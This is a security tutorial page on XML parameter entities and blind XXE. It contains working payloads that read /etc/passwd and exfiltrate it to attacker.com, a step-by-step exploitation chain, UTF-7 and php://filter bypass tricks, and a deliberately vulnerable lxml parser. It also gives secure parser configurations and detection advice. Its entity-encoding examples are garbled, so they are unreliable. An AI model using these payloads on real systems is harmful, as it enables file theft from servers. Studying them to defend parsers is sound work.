🟠High8.2

Parameter Entity Exploitation

Deep dive into parameter entities in DTDs and their role in advanced XXE exploitation techniques.

CWE-611: Improper Restriction of XML External Entity ReferenceOWASP Top 10:2021 - A05: Security Misconfiguration

Overview

Parameter entities are a special type of entity that can only be referenced within DTD declarations. They are prefixed with a percent sign (%) and provide powerful capabilities that attackers leverage for advanced XXE exploitation.

Key Differences from General Entities:

Parameter entities use % prefix instead of &
Can only be referenced within DTD (not in document content)
Can be used to construct dynamic DTD declarations
Essential for blind XXE and advanced exploitation techniques

Why Parameter Entities Matter for XXE:

Enable external DTD inclusion for blind XXE
Allow dynamic entity construction at parse time
Bypass restrictions on general entity expansion
Enable out-of-band data exfiltration
Can nest and chain for complex attacks

Parameter Entity Syntax

XMLparameter-entity-syntax.xml✓ Secure
<!-- Defining a parameter entity -->
<!ENTITY % paramEntity "entity content">

<!-- Referencing a parameter entity (in DTD only) -->
%paramEntity;

<!-- External parameter entity -->
<!ENTITY % remote SYSTEM "http://attacker.com/evil.dtd">
%remote;

<!-- Parameter entity with file content -->
<!ENTITY % file SYSTEM "file:///etc/passwd">

<!-- Using parameter entity to define general entity -->
<!ENTITY % wrapper "<!ENTITY generalEntity '%file;'>">
%wrapper;

Parameter Entity Restrictions

DTD-Only Scope: Parameter entities can only be referenced within DTD declarations, not in document content:

✅ Valid: <!ENTITY general "%param;"> (inside DTD) ❌ Invalid: <data>%param;</data> (in document content)

External Subset Requirement: Parameter entity replacement text cannot directly include other parameter entities in internal DTD subset. This restriction is bypassed by using external DTD subsets.

Nesting Limitations: Direct nesting like %entity1; inside %entity2; definition requires external DTD. This is why blind XXE typically requires fetching external DTD from attacker server.

Internal vs External DTD Subsets

XMLdtd-subsets.xml⚠️ Vulnerable
<!-- Internal DTD subset (inline in DOCTYPE) -->
<!DOCTYPE root [
  <!ENTITY % param "value">
  <!-- Cannot directly use %param; to define another entity here -->
]>

<!-- External DTD subset (referenced from DOCTYPE) -->
<!DOCTYPE root [
  <!ENTITY % remote SYSTEM "http://attacker.com/evil.dtd">
  %remote; <!-- Fetches and processes external DTD -->
]>

<!-- evil.dtd on attacker server -->
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY &#x25; exfil SYSTEM 'http://attacker.com/?data=%file;'>">
%eval;
<!-- Now %file; can be used within %eval; definition -->

Parameter Entity Exploitation Chain

A typical parameter entity XXE attack follows this chain:

Step 1: Declare external parameter entity

<!ENTITY % remote SYSTEM "http://attacker.com/xxe.dtd">

Step 2: Reference it to fetch external DTD %remote;

Step 3: External DTD reads file

<!ENTITY % file SYSTEM "file:///etc/passwd">

Step 4: External DTD creates dynamic entity

<!ENTITY % eval "<!ENTITY % send SYSTEM 'http://attacker.com/?d=%file;'>">

Step 5: Evaluate the dynamic entity %eval;

Step 6: Trigger the exfiltration %send;

Result: File content sent to attacker server in HTTP request.

Complete Parameter Entity Attack

XMLparam-entity-attack.xml⚠️ Vulnerable
<!-- User-submitted XML payload -->
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [
  <!ENTITY % remote SYSTEM "http://attacker.com/xxe.dtd">
  %remote;
]>
<root>
  <data>test</data>
</root>

<!-- xxe.dtd hosted on attacker.com -->
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY &#x25; exfil SYSTEM 'http://attacker.com/log?data=%file;'>">
%eval;
%exfil;

<!-- What happens: -->
<!-- 1. Parser loads external DTD from attacker.com -->
<!-- 2. %file; reads /etc/passwd -->
<!-- 3. %eval; creates %exfil; entity with file content -->
<!-- 4. %exfil; triggers HTTP request with file content -->
<!-- 5. Attacker receives /etc/passwd in HTTP server logs -->

Entity Reference Encoding

Notice the use of % in parameter entity definitions. This is crucial:

Why % instead of %?

% is XML numeric character reference for '%'
Required when defining entities that contain % symbols
Prevents premature entity expansion during parsing

Example:

<!ENTITY % wrapper "<!ENTITY % inner 'value'>">

When %wrapper; is expanded, it becomes:

<!ENTITY % inner 'value'>

Without proper encoding:

<!ENTITY % wrapper "<!ENTITY % inner 'value'>"> ❌ Parse error

With proper encoding:

<!ENTITY % wrapper "<!ENTITY % inner 'value'>"> ✅ Correct

Vulnerable Python Code

Pythonvulnerable_parser.py⚠️ Vulnerable
import xml.etree.ElementTree as ET
from lxml import etree

# Vulnerable: lxml with default settings
def parse_xml_vulnerable(xml_data):
    parser = etree.XMLParser()  # Default allows external entities
    tree = etree.fromstring(xml_data, parser)
    return tree

# Also vulnerable: resolving entities explicitly
def parse_xml_also_vulnerable(xml_data):
    parser = etree.XMLParser(resolve_entities=True)  # Explicitly dangerous
    tree = etree.fromstring(xml_data, parser)
    return tree

# Example usage that would be exploited
xml_input = '''<?xml version="1.0"?>
<!DOCTYPE root [
  <!ENTITY % remote SYSTEM "http://attacker.com/xxe.dtd">
  %remote;
]>
<root><data>test</data></root>'''

tree = parse_xml_vulnerable(xml_input)  # Fetches external DTD

Secure Python Code

Pythonsecure_parser.py✓ Secure
from lxml import etree
from defusedxml.lxml import fromstring as defused_fromstring

# Secure: Disable entity resolution
def parse_xml_secure(xml_data):
    parser = etree.XMLParser(
        resolve_entities=False,  # Disable entity expansion
        no_network=True,         # Disable network access
        dtd_validation=False,    # Disable DTD validation
        load_dtd=False          # Don't load DTD
    )
    tree = etree.fromstring(xml_data, parser)
    return tree

# Best practice: Use defusedxml library
def parse_xml_best_practice(xml_data):
    # defusedxml automatically applies security settings
    tree = defused_fromstring(xml_data)
    return tree

# Example safe usage
xml_input = '''<?xml version="1.0"?>
<!DOCTYPE root [
  <!ENTITY % remote SYSTEM "http://attacker.com/xxe.dtd">
  %remote;
]>
<root><data>test</data></root>'''

try:
    tree = parse_xml_secure(xml_input)  # Will reject external entities
except etree.XMLSyntaxError as e:
    print(f"Blocked malicious XML: {e}")

Advanced Parameter Entity Techniques

1. Chained Parameter Entities Multiple levels of parameter entity references for complex attacks:

%level1; defines %level2;
%level2; defines %level3;
%level3; performs exfiltration

2. UTF-7 Encoding Bypass Use UTF-7 encoding to bypass filters:

<?xml version="1.0" encoding="UTF-7"?>

+ADw-!ENTITY % remote SYSTEM "http://evil.com/xxe.dtd"+AD4-

3. Base64 Encoding for Binary Files Use PHP's data:// wrapper for base64 encoding:

<!ENTITY % file SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd">

4. Conditional Entity Definitions Define entities conditionally based on environment:

<!ENTITY % win "file:///c:/windows/win.ini"> <!ENTITY % unix "file:///etc/passwd">

Secure Java Configuration

JavaSecureXMLParser.java✓ Secure
import javax.xml.parsers.DocumentBuilderFactory;
import javax.xml.parsers.DocumentBuilder;
import org.w3c.dom.Document;

public class SecureXMLParser {
    public Document parseXML(String xml) throws Exception {
        DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance();
        
        // Disable DOCTYPE declarations entirely (strongest protection)
        factory.setFeature(
            "http://apache.org/xml/features/disallow-doctype-decl", 
            true
        );
        
        // If DOCTYPE needed, disable external entities
        factory.setFeature(
            "http://xml.org/sax/features/external-general-entities", 
            false
        );
        factory.setFeature(
            "http://xml.org/sax/features/external-parameter-entities",
            false  // Specifically blocks parameter entities
        );
        factory.setFeature(
            "http://apache.org/xml/features/nonvalidating/load-external-dtd",
            false
        );
        
        // Additional security settings
        factory.setXIncludeAware(false);
        factory.setExpandEntityReferences(false);
        
        DocumentBuilder builder = factory.newDocumentBuilder();
        return builder.parse(new ByteArrayInputStream(xml.getBytes()));
    }
}

Detecting Parameter Entity Attacks

Code Review Indicators:

XML parsers without explicit external entity controls
Resolving entities enabled (resolve_entities=True)
Missing security features in parser configuration
DTD processing not explicitly disabled

Runtime Detection:

Outbound HTTP/DNS requests from XML parser processes
Connections to unexpected external hosts during XML processing
DNS queries with unusual subdomains during parsing
Error messages mentioning external entity loading

Testing Approach:

Submit XML with external parameter entity reference
Monitor for outbound connections to test server
Check if external DTD is fetched
Attempt file exfiltration via parameter entities
Test error-based parameter entity techniques

Prevention Best Practices

Disable External Parameter Entities: Explicitly set external-parameter-entities feature to false
Disable DOCTYPE: Disallow DOCTYPE declarations entirely if not needed
Use Secure Parsers: Leverage libraries like defusedxml (Python), configure secure features (Java/.NET)
Input Validation: Reject XML containing DOCTYPE or <!ENTITY declarations
Network Controls: Block outbound connections from XML processing servers
Regular Updates: Keep XML parsing libraries up to date
Defense in Depth: Combine multiple protective measures
Static Analysis: Use tools to detect insecure XML parser configurations